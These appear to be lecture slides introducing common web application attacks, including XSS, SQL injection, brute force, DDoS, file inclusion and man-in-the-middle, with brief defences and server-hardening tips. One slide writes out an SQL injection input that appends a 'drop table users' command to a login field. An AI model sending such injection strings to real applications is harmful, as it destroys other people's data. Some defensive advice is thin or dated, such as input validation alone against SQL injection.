Web Application Security

Components & Architecture

2

Security Threats

• Cross-site scripting• SQL injection• Denial-of-service attack• Brute Force attack• Remote file inclusion• Man in Middle Attack• Other Server side Threats.

Cross-site scripting(XSS)

• Allows attackers to inject their own malicious scripts onto web pages and have it executed by the user’s browser

• Vulnerability commonly seen in :– Search results that display back the text that was entered– Error messages that display the text that caused the error – Forms which are filled out whose values are later

displayed to the user– Web message boards where users can post messages

Defense tactics

Write an HTMLEncode

SQL Injection

• The process of attacker adding his own SQL Statements in user input

• Used by attackers to– Gain confidential information (Credit Card numbers, Account

details etc.)– Bypass authorization – Perform unauthorized updates

• Injection occurs through :– Input fields (e.g. UserID and Password entry)– Query string (values added to website’s URL)– Manipulated values in HTML

10

UserID: TestPassword : 123

Select * from Users where UserID = ‘Test’ and Password = ‘123’;

Web Applications take user input and build an SQL statement which they send to the database

Drop example

11

UserID: Test; drop table users; -- Password : 123

Select * from Users where UserID = ‘Test’; drop table users; -- and Password = ‘123’;

Web Applications take user input and build an SQL statement which they send to the database

SQL Injection Defense• It is quite simple: input validation

• Check all input

• Web Applications should not directly build SQL statements based on user input

Brute Force Attack

• A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN).

• In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data. Brute force attacks may be used by criminals to crack encrypted data, or by security analysts to test an organization's network security.

A brute force attack may also be referred to as brute force cracking.

Preventing Brute Force Attack

• Implement an account lockout policy• Another technique is to use a challenge-

response test to prevent automated submissions of the login page. Tools such as the free reCAPTCHA

• Web application should enforce the use of strong passwords

Dos and DDOS

• Attempt to make a machine or network resource unavailable to its intended users.

• One common method of attack involves saturating the target machine with external communications requests

• attacks usually lead to a server overload

Effects of DDOS

• Consumption of computational resources, such as bandwidth, memory, disk space, or processor time.

• Disruption of configuration information, such as routing information.

• Disruption of state information, such as unsolicited resetting of TCP sessions.

• Disruption of physical network components.• Obstructing the communication media between the

intended users and the victim so that they can no longer communicate adequately.

DDOS Prevention

• An effective defense against an HTTP flood can be the deployment of a reverse proxy

• increase the capability of the system.• Load-balancing tools can distribute requests

among many servers scattered across a wide geographical area

Remote file inclusion

• It allows an attacker to include a file, usually through a script on the web server.

• vulnerability occurs due to the use of user-supplied input without proper validation

This can lead to

• Code execution on the web server• Code execution on the client-side such

as JavaScript which can lead to other attacks such as cross site scripting (XSS)

• Denial of service (DoS)• Data theft/manipulation

Prevention

• This type of attack can be defended against at the .htaccess level and by filtering the inputs.

• Make sure you keep the Global Registers OFF. This is a biggie that will prevent much evil!

• Hardening the Server

Man in Middle Attack

• A man-in-the-middle attack is a type of cyberattack where a malicious actor inserts him/herself into a conversation between two parties,

• A MITM attack exploits the real-time processing of transactions, conversations or transfer of other data.

Prevention

• use a strong encryption between the client and the server

• you can use a browser plug-in such as HTTPS Everywhere or ForceTLS.

Server Hardening

• Shut down unused Services

• Hide Services with Port Knocking– Example:

• Web Server Service is public • hide SFTP-, SSH- Services

• Use Onetime Passwords by generating them with Password generators

25

Restrict Resources to avoid DoS-Attacks• Change Default TimeOut • Restrict HTTP-Requests

Restrict access to Web Resources • Often resources are not to be accessible for everyone• htaccess is a simple mechanism for access Protection• htaccess is activated by a file .htaccess to protected

directory (or above in one)

26

Source: http://www.howtomonster.com/2007/08/12/how-to-restrict-access-to-a-web-site-folder/

Hide our Informations

Linux Systems Monitoring Cycle

28

OWASP

• The Open Web Application Security Project is an online community dedicated to web application security. The OWASP community includes corporations, educational organizations, and individuals from around the world

• https://www.owasp.org/